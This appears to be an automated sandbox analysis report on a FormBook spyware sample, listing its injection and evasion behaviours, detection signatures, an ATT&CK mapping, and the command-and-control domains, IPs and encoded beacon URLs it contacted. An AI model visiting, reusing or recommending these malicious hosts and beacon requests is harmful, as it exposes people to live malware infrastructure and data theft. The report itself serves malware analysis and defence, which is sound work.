          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.911281407.0000000000FB0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.732150923.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.732300917.0000000001110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.689872337.0000000003CC9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.911225919.0000000000F80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.0O9BJfVJi6fEMoS.exe.3d11730.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.911281407.0000000000FB0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.732150923.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.732300917.0000000001110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.689872337.0000000003CC9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.911225919.0000000000F80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.0O9BJfVJi6fEMoS.exe.3d11730.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading1OS Credential DumpingSecurity Software Discovery121Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion3LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 356555 Sample: 0O9BJfVJi6fEMoS.exe Startdate: 23/02/2021 Architecture: WINDOWS Score: 100 35 www.grandwhale.com 2->35 37 www.smallbathroomdecor.info 2->37 39 HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com 2->39 47 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->47 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 4 other signatures 2->53 11 0O9BJfVJi6fEMoS.exe 3 2->11         started        signatures3 process4 file5 33 C:\Users\user\...\0O9BJfVJi6fEMoS.exe.log, ASCII 11->33 dropped 63 Tries to detect virtualization through RDTSC time measurements 11->63 65 Injects a PE file into a foreign processes 11->65 15 0O9BJfVJi6fEMoS.exe 11->15         started        18 0O9BJfVJi6fEMoS.exe 11->18         started        signatures6 process7 signatures8 67 Modifies the context of a thread in another process (thread injection) 15->67 69 Maps a DLL or memory area into another process 15->69 71 Sample uses process hollowing technique 15->71 73 Queues an APC in another process (thread injection) 15->73 20 explorer.exe 15->20 injected process9 dnsIp10 41 dgcsales.net 184.106.16.223, 49764, 80 RACKSPACEUS United States 20->41 43 www.besteprobioticakopen.online 94.23.162.163, 49770, 80 OVHFR France 20->43 45 17 other IPs or domains 20->45 55 System process connects to network (likely due to code injection or exploit) 20->55 24 explorer.exe 20->24         started        27 autofmt.exe 20->27         started        signatures11 process12 signatures13 57 Modifies the context of a thread in another process (thread injection) 24->57 59 Maps a DLL or memory area into another process 24->59 61 Tries to detect virtualization through RDTSC time measurements 24->61 29 cmd.exe 1 24->29         started        process14 process15 31 conhost.exe 29->31         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          0O9BJfVJi6fEMoS.exe22%ReversingLabsWin32.Spyware.Convagent

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          6.2.0O9BJfVJi6fEMoS.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.2.0O9BJfVJi6fEMoS.exe.32e0000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          11.2.explorer.exe.13e0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          karthikeyainfraindia.com0%VirustotalBrowse
          td-balancer-euw2-6-109.wixdns.net0%VirustotalBrowse
          www.besteprobioticakopen.online1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.fastenerspelosato.net/uszn/?I48=ilzBSMt+mC5PnIueaE0o4kFNHHW8rQxTZUVxaBcrk7HNT8xc6ayAEkd5Nrf40/DEmyGF&ofrxU=yVMtQLoX0%Avira URL Cloudsafe
          http://www.horisan-touki.com/uszn/?I48=QfBSKsl5Vu8QEYvg6r6EpYBO+tHghinNKHDEOdj6/CEQOiVDlwCi9gx1TH+D8HDA3Ujy&ofrxU=yVMtQLoX0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.buysellleasewithlisa.com/uszn/?I48=mPpTgQkduQgKd9eKHDnKxG7Zl5xM97I2KtefNy7cE9uF2W6RPqZ+V0j9JFBrxigWFYGz&ofrxU=yVMtQLoX0%Avira URL Cloudsafe
          http://www.esvstudybible.org/search?q=0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.esvstudybible.org/search?q=Whttp://www.blueletterbible.org/Bible.cfm?b=0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://topicalmemorysystem.googlecode.com/files/0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.fertinvitro.doctor/uszn/?I48=z5jHb1CZWrsr2p16zetrIsrl3FBZKeiByVV0oSV+dvaqVG1rneJc4YmewlelB8A40GEQ&ofrxU=yVMtQLoX0%Avira URL Cloudsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.whereinthezooareyou.com/uszn/?I48=lR8nCh02VBrVevH9DBfx7BVzy1/OBYfsNcE9m+G8n0i7QYmfgEfs3uLKSpan4882ouVy&ofrxU=yVMtQLoX0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.sissysundays.com/uszn/?I48=52ikA0v5VO8qsylJfSO1DetMiatJe0E1D9rBoJ+nHZYmtxf70roQflY+S8wYouTF3o6y&ofrxU=yVMtQLoX0%Avira URL Cloudsafe
          www.besteprobioticakopen.online/uszn/100%Avira URL Cloudmalware
          http://www.karthikeyainfraindia.com/uszn/?I48=L/tqFlZRmZhJZD1iC7RgW0bOgnRBAskMdyXY70yD3QYv5j7RY53hkHd2ZTpB0JeH3WIq&ofrxU=yVMtQLoX0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.besteprobioticakopen.online/uszn/?I48=5LoNRXVM8eyE2Me8xFE40xCr0JzPAOX0MOzM3KUbBxAS8JEwG8sqp8Wi1O663rh9uwDV&ofrxU=yVMtQLoX100%Avira URL Cloudmalware
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.dgcsales.net/uszn/?I48=hu5lsjyQ8jtyvTSzqUKsO9FdlIq7HJAoGWXF85Byxyx8kG/0QeCZ2D448NGSTsl89HtB&ofrxU=yVMtQLoX0%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.horisan-touki.com
          		118.27.99.84
          		truetrue
            		unknown
            karthikeyainfraindia.com
            		202.66.173.116
            		truetrueunknown
            td-balancer-euw2-6-109.wixdns.net
            		35.246.6.109
            		truetrueunknown
            www.besteprobioticakopen.online
            		94.23.162.163
            		truetrueunknown
            HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com
            		3.223.115.185
            		truefalse
              		high
              buysellleasewithlisa.com
              		160.153.136.3
              		truetrue
                		unknown
                www.fastenerspelosato.net
                		142.91.239.112
                		truetrue
                  		unknown
                  shops.myshopify.com
                  		23.227.38.74
                  		truetrue
                    		unknown
                    fertinvitro.doctor
                    		34.102.136.180
                    		truetrue
                      		unknown
                      dgcsales.net
                      		184.106.16.223
                      		truetrue
                        		unknown
                        www.smallbathroomdecor.info
                        		88.214.207.96
                        		truefalse
                          		unknown
                          www.sissysundays.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.whereinthezooareyou.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.buysellleasewithlisa.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.guilhermeoliveiro.site
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.grandwhale.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.dgcsales.net
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.fertinvitro.doctor
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.karthikeyainfraindia.com
                                        		unknown
                                        		unknowntrue
                                          		unknown

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          http://www.fastenerspelosato.net/uszn/?I48=ilzBSMt+mC5PnIueaE0o4kFNHHW8rQxTZUVxaBcrk7HNT8xc6ayAEkd5Nrf40/DEmyGF&ofrxU=yVMtQLoXtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.horisan-touki.com/uszn/?I48=QfBSKsl5Vu8QEYvg6r6EpYBO+tHghinNKHDEOdj6/CEQOiVDlwCi9gx1TH+D8HDA3Ujy&ofrxU=yVMtQLoXtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.buysellleasewithlisa.com/uszn/?I48=mPpTgQkduQgKd9eKHDnKxG7Zl5xM97I2KtefNy7cE9uF2W6RPqZ+V0j9JFBrxigWFYGz&ofrxU=yVMtQLoXtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.fertinvitro.doctor/uszn/?I48=z5jHb1CZWrsr2p16zetrIsrl3FBZKeiByVV0oSV+dvaqVG1rneJc4YmewlelB8A40GEQ&ofrxU=yVMtQLoXtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.whereinthezooareyou.com/uszn/?I48=lR8nCh02VBrVevH9DBfx7BVzy1/OBYfsNcE9m+G8n0i7QYmfgEfs3uLKSpan4882ouVy&ofrxU=yVMtQLoXtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.sissysundays.com/uszn/?I48=52ikA0v5VO8qsylJfSO1DetMiatJe0E1D9rBoJ+nHZYmtxf70roQflY+S8wYouTF3o6y&ofrxU=yVMtQLoXtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          www.besteprobioticakopen.online/uszn/true
                                          • Avira URL Cloud: malware
                                          		low
                                          http://www.karthikeyainfraindia.com/uszn/?I48=L/tqFlZRmZhJZD1iC7RgW0bOgnRBAskMdyXY70yD3QYv5j7RY53hkHd2ZTpB0JeH3WIq&ofrxU=yVMtQLoXtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.besteprobioticakopen.online/uszn/?I48=5LoNRXVM8eyE2Me8xFE40xCr0JzPAOX0MOzM3KUbBxAS8JEwG8sqp8Wi1O663rh9uwDV&ofrxU=yVMtQLoXtrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.dgcsales.net/uszn/?I48=hu5lsjyQ8jtyvTSzqUKsO9FdlIq7HJAoGWXF85Byxyx8kG/0QeCZ2D448NGSTsl89HtB&ofrxU=yVMtQLoXtrue
                                          • Avira URL Cloud: safe
                                          		unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          http://www.apache.org/licenses/LICENSE-2.00O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.fontbureau.com0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpfalse
                                              		high
                                              http://www.fontbureau.com/designersG0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpfalse
                                                		high
                                                http://www.fontbureau.com/designers/?0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://www.founder.com.cn/cn/bThe0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designers?0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://www.biblegateway.com/passage/?search=0O9BJfVJi6fEMoS.exefalse
                                                      		high
                                                      http://www.esvstudybible.org/search?q=0O9BJfVJi6fEMoS.exefalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.tiro.comexplorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.esvstudybible.org/search?q=Whttp://www.blueletterbible.org/Bible.cfm?b=0O9BJfVJi6fEMoS.exefalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.fontbureau.com/designersexplorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://www.goodfont.co.kr0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://topicalmemorysystem.googlecode.com/files/0O9BJfVJi6fEMoS.exefalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.biblija.net/biblija.cgi?m=0O9BJfVJi6fEMoS.exefalse
                                                          		high
                                                          http://www.carterandcone.coml0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.sajatypeworks.com0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.typography.netD0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.fontbureau.com/designers/cabarga.htmlN0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpfalse
                                                            		high
                                                            http://www.founder.com.cn/cn/cThe0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.galapagosdesign.com/staff/dennis.htm0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://fontfabrik.com0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.founder.com.cn/cn0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.fontbureau.com/designers/frere-user.html0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://www.blueletterbible.org/Bible.cfm?b=0O9BJfVJi6fEMoS.exefalse
                                                                		high
                                                                http://www.jiyu-kobo.co.jp/0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.galapagosdesign.com/DPlease0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.fontbureau.com/designers80O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpfalse
                                                                  		high
                                                                  https://www.hugedomains.com/domain_profile.cfm?d=grandwhale&e=comexplorer.exe, 0000000B.00000002.915089078.00000000056C2000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    http://www.%s.comPAexplorer.exe, 00000007.00000002.913073739.0000000002B50000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		low
                                                                    http://www.fonts.com0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpfalse
                                                                      		high
                                                                      http://www.sandoll.co.kr0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.urwpp.deDPlease0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.zhongyicts.com.cn0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.sakkal.com0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://www.hugedomains.com/domain_profile.cfm?d=grandwhale&e=comexplorer.exe, 0000000B.00000002.915089078.00000000056C2000.00000004.00000001.sdmpfalse
                                                                        		high

                                                                        Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        202.66.173.116
                                                                        		unknownIndia
                                                                        		17439NETMAGIC-APNetmagicDatacenterMumbaiINtrue
                                                                        35.246.6.109
                                                                        		unknownUnited States
                                                                        		15169GOOGLEUStrue
                                                                        94.23.162.163
                                                                        		unknownFrance
                                                                        		16276OVHFRtrue
                                                                        118.27.99.84
                                                                        		unknownJapan7506INTERQGMOInternetIncJPtrue
                                                                        160.153.136.3
                                                                        		unknownUnited States
                                                                        		21501GODADDY-AMSDEtrue
                                                                        142.91.239.112
                                                                        		unknownUnited States
                                                                        		395954LEASEWEB-USA-LAX-11UStrue
                                                                        23.227.38.74
                                                                        		unknownCanada
                                                                        		13335CLOUDFLARENETUStrue
                                                                        34.102.136.180
                                                                        		unknownUnited States
                                                                        		15169GOOGLEUStrue
                                                                        184.106.16.223
                                                                        		unknownUnited States
                                                                        		19994RACKSPACEUStrue

                                                                        General Information

                                                                        Joe Sandbox Version:31.0.0 Emerald
                                                                        Analysis ID:356555
                                                                        Start date:23.02.2021
                                                                        Start time:10:05:36
                                                                        Joe Sandbox Product:CloudBasic
                                                                        Overall analysis duration:0h 11m 46s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
